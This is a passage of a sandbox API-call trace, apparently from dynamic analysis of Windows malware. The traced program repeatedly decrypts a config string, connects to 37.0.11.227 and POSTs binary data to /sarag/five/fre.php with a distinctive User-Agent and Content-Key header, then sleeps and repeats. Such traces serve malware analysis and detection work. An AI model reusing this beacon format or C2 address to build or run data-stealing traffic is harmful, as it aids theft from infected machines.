lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17b8) returned 0x954 [0292.075] Sleep (dwMilliseconds=0xea60) [0292.077] GetProcessHeap () returned 0x690000 [0292.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0292.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.078] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.088] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0292.095] GetProcessHeap () returned 0x690000 [0292.095] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0292.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.096] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0292.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.098] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.099] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.099] GetProcessHeap () returned 0x690000 [0292.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0292.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.106] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0292.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.107] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0292.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.107] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0292.107] GetProcessHeap () returned 0x690000 [0292.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0292.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.108] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0292.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.109] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0292.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.110] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0292.111] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.111] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0292.111] GetProcessHeap () returned 0x690000 [0292.111] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0292.111] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0292.111] GetProcessHeap () returned 0x690000 [0292.112] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0292.112] GetProcessHeap () returned 0x690000 [0292.112] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0292.112] GetProcessHeap () returned 0x690000 [0292.112] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0292.112] GetProcessHeap () returned 0x690000 [0292.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0292.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.113] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.117] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0292.123] GetProcessHeap () returned 0x690000 [0292.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0292.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.124] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0292.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.125] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.125] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.125] GetProcessHeap () returned 0x690000 [0292.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0292.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.127] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0292.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.127] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0292.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.128] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0292.128] GetProcessHeap () returned 0x690000 [0292.128] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0292.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.129] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0292.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.130] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0292.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.131] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0292.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.132] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0292.132] GetProcessHeap () returned 0x690000 [0292.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0292.132] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0292.132] GetProcessHeap () returned 0x690000 [0292.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0292.132] socket (af=2, type=1, protocol=6) returned 0x958 [0292.133] connect (s=0x958, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0292.156] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0292.156] GetProcessHeap () returned 0x690000 [0292.157] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0292.157] GetProcessHeap () returned 0x690000 [0292.157] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0292.157] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0292.158] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0292.158] GetProcessHeap () returned 0x690000 [0292.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0292.158] GetProcessHeap () returned 0x690000 [0292.159] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0292.159] GetProcessHeap () returned 0x690000 [0292.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0292.159] GetProcessHeap () returned 0x690000 [0292.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0292.160] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0292.160] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0292.160] GetProcessHeap () returned 0x690000 [0292.160] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0292.160] GetProcessHeap () returned 0x690000 [0292.161] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0292.161] send (s=0x958, buf=0x6ad508*, len=242, flags=0) returned 242 [0292.161] send (s=0x958, buf=0x6aba40*, len=159, flags=0) returned 159 [0292.162] GetProcessHeap () returned 0x690000 [0292.162] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0292.162] recv (in: s=0x958, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0292.236] GetProcessHeap () returned 0x690000 [0292.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0292.237] GetProcessHeap () returned 0x690000 [0292.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0292.237] GetProcessHeap () returned 0x690000 [0292.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0292.238] GetProcessHeap () returned 0x690000 [0292.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0292.238] closesocket (s=0x958) returned 0 [0292.239] GetProcessHeap () returned 0x690000 [0292.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0292.239] GetProcessHeap () returned 0x690000 [0292.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0292.239] GetProcessHeap () returned 0x690000 [0292.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0292.239] GetProcessHeap () returned 0x690000 [0292.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0292.240] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17bc) returned 0x958 [0292.241] Sleep (dwMilliseconds=0xea60) [0292.243] GetProcessHeap () returned 0x690000 [0292.243] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0292.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.244] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.257] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0292.267] GetProcessHeap () returned 0x690000 [0292.267] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0292.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.268] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0292.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.268] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.269] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.269] GetProcessHeap () returned 0x690000 [0292.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0292.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.270] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0292.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.271] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0292.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.275] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0292.275] GetProcessHeap () returned 0x690000 [0292.275] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0292.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.276] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0292.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.277] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0292.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.277] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0292.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.278] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0292.278] GetProcessHeap () returned 0x690000 [0292.278] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0292.278] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0292.279] GetProcessHeap () returned 0x690000 [0292.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0292.279] GetProcessHeap () returned 0x690000 [0292.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0292.280] GetProcessHeap () returned 0x690000 [0292.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0292.280] GetProcessHeap () returned 0x690000 [0292.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0292.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.281] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.285] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0292.291] GetProcessHeap () returned 0x690000 [0292.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0292.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.292] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0292.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.292] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.293] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.293] GetProcessHeap () returned 0x690000 [0292.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0292.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.294] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0292.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.295] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0292.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.296] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0292.296] GetProcessHeap () returned 0x690000 [0292.296] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0292.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.297] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0292.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.298] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0292.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.299] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0292.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.300] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0292.300] GetProcessHeap () returned 0x690000 [0292.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0292.300] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0292.300] GetProcessHeap () returned 0x690000 [0292.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0292.300] socket (af=2, type=1, protocol=6) returned 0x95c [0292.300] connect (s=0x95c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0292.323] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0292.323] GetProcessHeap () returned 0x690000 [0292.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0292.323] GetProcessHeap () returned 0x690000 [0292.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0292.324] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0292.324] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0292.324] GetProcessHeap () returned 0x690000 [0292.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0292.324] GetProcessHeap () returned 0x690000 [0292.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0292.325] GetProcessHeap () returned 0x690000 [0292.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0292.325] GetProcessHeap () returned 0x690000 [0292.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0292.326] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0292.326] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0292.326] GetProcessHeap () returned 0x690000 [0292.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0292.326] GetProcessHeap () returned 0x690000 [0292.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0292.327] send (s=0x95c, buf=0x6ad508*, len=242, flags=0) returned 242 [0292.327] send (s=0x95c, buf=0x6aba40*, len=159, flags=0) returned 159 [0292.327] GetProcessHeap () returned 0x690000 [0292.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0292.327] recv (in: s=0x95c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0292.404] GetProcessHeap () returned 0x690000 [0292.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0292.405] GetProcessHeap () returned 0x690000 [0292.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0292.406] GetProcessHeap () returned 0x690000 [0292.406] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0292.406] GetProcessHeap () returned 0x690000 [0292.406] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0292.407] closesocket (s=0x95c) returned 0 [0292.407] GetProcessHeap () returned 0x690000 [0292.407] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0292.407] GetProcessHeap () returned 0x690000 [0292.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0292.408] GetProcessHeap () returned 0x690000 [0292.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0292.408] GetProcessHeap () returned 0x690000 [0292.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0292.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17c4) returned 0x95c [0292.413] Sleep (dwMilliseconds=0xea60) [0292.415] GetProcessHeap () returned 0x690000 [0292.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0292.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.416] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.424] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0292.431] GetProcessHeap () returned 0x690000 [0292.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0292.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.432] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0292.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.433] 